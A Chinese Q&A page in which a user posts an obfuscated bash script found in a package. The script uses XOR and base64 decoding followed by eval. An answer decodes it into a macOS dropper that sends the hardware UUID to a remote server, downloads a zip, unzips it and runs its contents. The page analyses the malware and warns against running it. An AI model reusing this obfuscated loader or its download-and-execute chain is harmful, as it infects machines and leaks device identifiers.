一个可疑的bash代码,谁能帮助我解释它?

时间:2018-07-30 15:37:09

标签: bash eval obfuscation

打开一个包装后,我发现了一段代码,因为我不擅长bash,不知道该怎么办,但我怀疑这是一个恶意代码,可以帮助我解释它。

#!/bin/bash
_l() {
    _i=0;_x=0;
    for ((_i=0; _i<${#1}; _i+=2)) do
        __return_var="$__return_var$(printf "%02x" $(( ((0x${1:$_i:2})) ^ ((0x${2:$_x:2})) )) )"
        if (( (_x+=2)>=${#2} )); then ((_x=0)); fi
    done
    if [[ "$3" ]]; then eval "$3='$__return_var'"; else echo -n "$__return_var"; fi
}

_m() {
    _v=$(base64 --decode <(printf "$1"));_k=$(xxd -pu <(printf "$2"));
    __return_var="$(xxd -r -p <(_l "$_v" "$_k"))"
    if [[ "$3" ]]; then eval "$3='$__return_var'"; else echo -n "$__return_var"; fi
}
_y="8903139122"
_t="MWIxODFmNTE1ODVkMTY1MzUzNDE1MDE5M2EzOTc0N2Q3YTZlNjI3MzZiNmEwZDExMDkwYTA5MDIwMzAxMDEwODAyMDExMzM5Nzg2MTYyNmQ3Yzc2N2Q3Mjc4N2QwNDEzNDU0NTRmMTc1MTVlNTI1YTU3MWY0MTQyNTk1YTU1MTEzYjcyNjk2MTZkNjA3NzZjNjQ3NjBjMTE1ZDVlNDU1YzU0NTY1MTU3MWU1NzU1NDI0NjEwMzI0YzVlNDk1ODQzNjY0MTUzNDE0YjRlNWY0MTU1MGUxYjAzMDAwMzAxMGEwMTAwMDEwYTAxMDkwYjAyMGIwODAzMGEwMDAxMGIwODEwMzgzMjU2NDM2YzQ3NTY0YjQyNWI1ZDU2MDQxMjE3MTk0MDRlNmU0NDU3NGE0YTEwMWU0MTQxNTY1NTQ3NTE0YzZmNTU0MTQyNWE1NjVmMWIxMDE4MzM0MzU2NDI0MDUwNWU1YzZkNWY0YzU5NTcwYzExMWQxOTQ3NDc1MTVkNTc1NjVmMWExYjExMzg1ZjU5NWE1ODVhNWY1NjY2NTg1NjBmMWExZDE4NTY1MjViNTYxMTFmNWMxODFiMTQxYjU4NWM0YjU0NTUxMjE1NGI1NDAyMTExZTVhMTE3YjdkNjg1NTUxNDc1NzVjNGI1Yzc3NGE0ODVjNDI0Nzc1NTY0ZjU4NTE1NzE4NDUxMDU0NDM1NjQ5MTExZjVkMTgxZTEyN2E3ZTYzNTU1MDQ2NTQ1NzRiNWQ2NjY0N2E3ZDEzMTIwZjE4MWI2YzFiMWYxOTY1MTgxMDE1MTg0NTEwNDA1NDU3MTkxYzc3MTIxNTU3MTAxNDQyNzMxNzFiMTAxYTYzNjcxMjZlMWExYTFiNzE2ZTAzNzg0OTE3MWExMzEzNDUxMTQ2NDAxODE0NTQ1MDExMTQ2MjZhMDg0MjRhNTA1ZTQ3MGI2ZTY0MTYxYjEwMTgzMzNhNDY0MzVmMDQxMzVhNDY0YzQ5MGExYzFlMTc0MjcwNjI2MjY3N2Q3ZjdlNzA3YTc3NGMxZDE2NDM3ODYwNjM2ZTYxNzY2NDY2Nzc0NTA2NWQ1YTU1MGUxZDRhNWY1MzViNTE1OTVkNTQ2YzUwNTU0ZjE0NGIwNDE0NDg0MjU2NGE0MjViNWQ1NjY2NTc0NjU4NTc0NDE3NWQwZjFjNDI1ZjQwNmU0NTVjNDM0MTViNTc1NzRkMTU0MTBlMWQ0YTc3N2M3YjY2NjA3MjYyNjA0NDEzMzg0NjU1NDk2ZjQzNTA0NzUxMGMxMDE2MTA1NDViNDc1NDVlNDkxMTFkNDY1NTQ5MWY2YjY5NmI2MTY5NmE2YTYwNjExOTExM2I1MDRjNDM1ZTEyMTU1ZjAwN2YxMTExMWQ0YTQ3NDA1NDQ0MTIxMzBmMWM1ZDU0NDQxZDU2NGM1YzVmMTEwMTA3MTcwMzEyMDYwNzEwMTc0YTQ3NTQ0MTZkNDI1OTRkNTg0ZTExMzk1ODQxNDI2ZDVjNTA0MjBlMTMxNzExNWM1OTQ2NWQ1NDQwMTMxYzU3MTkxZTQ2NWY0ODE2Njg2YjY5NmI2MTY5NmE2YTExMTYxMjEzM2I0NjU3NGI1YjQyMTgxNDYwMTMxMzE3NDI0NDVjNDg1MTQ5NmY0MzUwNDA0YTQ2NWQ0MDVjNDQxMjEzMTMxNzQyNDU1ZjQyNjc0OTUxNDc1OTRlMWIxMTFmNTYxODFiMTQ0ODUwNDM0OTZlNTY1YjRhNDQxMjEzMGYxMzE2NTU1NzQ0MTc1NzQ1NWY1ZDEzMGIwZjE0MDMxODMzNDI1ZTExMWU1ZjExMTY0OTRjNTQ0MDZjNDE1MjRkNTk0ZjEyMzI1ZjU5NWY1NDZjNTc1MDVmNTcwNTFiMTQxYjU2NDE1YzQxMTIxZjU1MDgxMDFlNDcxMzFiMWIxYzUzNDg0OTEyMTMwZDFiNTU0MjEyMWYwOTE5MTIxNzRhNTI0OTQxNmQ1NjUxNGI0ZDExMTgxYTFiMTEzODQ0NTc1NTQ1NWU1NDZjNTc1MDVmNTcwNTFiMTQxYjU0NTA1MTVlMTIxZjU2MTkxMjE3NGE2MzZlNzU0ZjEwMTg0NTEwNDA1NDU3MTkxYzc3MTIxNTU3MTAxNDQyNzM2NzE5MWQ2NDU3NTU0NTVlNTQ0MDE2NmE2YzFkNjUxMjE5MWMxZjE5Nzk2ZDAzNzI0ODFlMTkxMTExMzk0ZjVlNWU0NzU1NWM2ZjVkNTA1ZTVjMGMxMDE2NDM0ZjVmNWY0NDVlNWM2ZTVjNTM1NTVjMWYxYzExMWMxYzAzMDI0ZjFhMTkzYTUwNTk1ZTU2NTUxMjE5NDAxOTEyMTc0YTUyNDk0MTZkNTY1MTRiNGQxNzRhNTU1MDVkNTc2ZDU2NTg1ZDU2NGMxYzdhNWU1YzQ2NWQ1NzQ0NDAxZTdlNTg1MjdkNjExYTE2MWExMzNiNWM0OTU0NWMxMjE1NTgxMDExMTU0ODU4NDE0MjZkNWM1MDQyNGUxNTQ4NWY1ODVlNTc2NzU3NTE1ZTU0NGUxYjExMWYxZjU5NGI1NzQwMTExMTRhMTMxMjEwMWM0MjQzNTY0MjQwNTA1ZTVjNmQ1ZjRjNTk1NzRjMTExOTEzMTY0OTRlNTY1YzQ2NWM1NjY2NWY1MzVmNWQ0NDEyMzkK"

eval "$(_m "$_t" "$_y")"

1 个答案:

答案 0 :(得分:3)

顶部_l()_m()的两个函数读取两个字符串_y_t_t包含混淆的代码,_y的行为有点像键。将该密钥逐个应用于混淆后的代码,以创建一个base64字符串,该字符串可以解码为eval命令可以执行的bash程序。

删除eval并回显类似echo "$(_m "$_t" "$_y")"的结果,将吐出将由eval命令执行的代码。这是绝对安全的,因为我们现在实际上并没有eval对混淆后的代码进行处理:

#!/bin/bash

ENC_PASS=<somepasswordhere>
APP_DOMAIN=<somewebsite>
APP_ROUTE="download/dlst"
unzip_password=<anotherpasswordhere>

os_version="$(sw_vers -productVersion)"
session_guid="$(uuidgen)"
machine_id="$(echo -n "$(ioreg -rd1 -c IOPlatformExpertDevice | grep -o '"IOPlatformUUID" = "\(.*\)"' | sed -E -n 's@.*"([^"]+)"@\1@p')" | tr -dc '[[:print:]]')"

url="http://${APP_DOMAIN}/${APP_ROUTE}?mid=${machine_id}&s=${session_guid}&o=${os_version}&p=${ENC_PASS}"
tmp_path="$(mktemp /tmp/XXXXXXXXX)"
curl -f0L "${url}" >/dev/null 2>&1 >> ${tmp_path}
app_dir="$(mktemp -d /tmp/XXXXXXXX)/"
unzip -P "${unzip_password}" "${tmp_path}" -d "${app_dir}" > /dev/null 2>&1
rm -f ${tmp_path}
file_name="$(grep -m1 -v "*.app" <(ls -1 "${app_dir}"))"
volume_name="$(echo -n "${PWD}" | sed -E -n 's@^(/Volumes/[^/]+)/.*@\1@p')"
volume_name="${volume_name// /%20}"
chmod +x "${app_dir}${file_name}/Contents/MacOS"/*
open -a "${app_dir}${file_name}" --args "s" "${session_guid}" "${volume_name}"

我建议不要运行。经过编辑,删除了网站和密码,以防万一,以防万一。这种混淆是由一些非常狡猾但有偏见的开发人员完成的,实际上并不是恶意的……尽管这几乎绝对是恶意的。您可以在没有eval的情况下自行运行,以查看编辑过的位。

在较高级别上,这会将您的伴奏信息发送到服务器并下载一个zip文件。解压缩该zip文件,将其内容设置为可执行文件,然后执行它们。由于zip(duh)中的MacOS子文件夹,因此只能在Mac上使用,而且还使用ioreg程序来收集存储在machine_id中的数据,该数据将被发送到远程服务器

下一步是获取该zip并查看其功能。我没有下载;)

相关问题
最新问题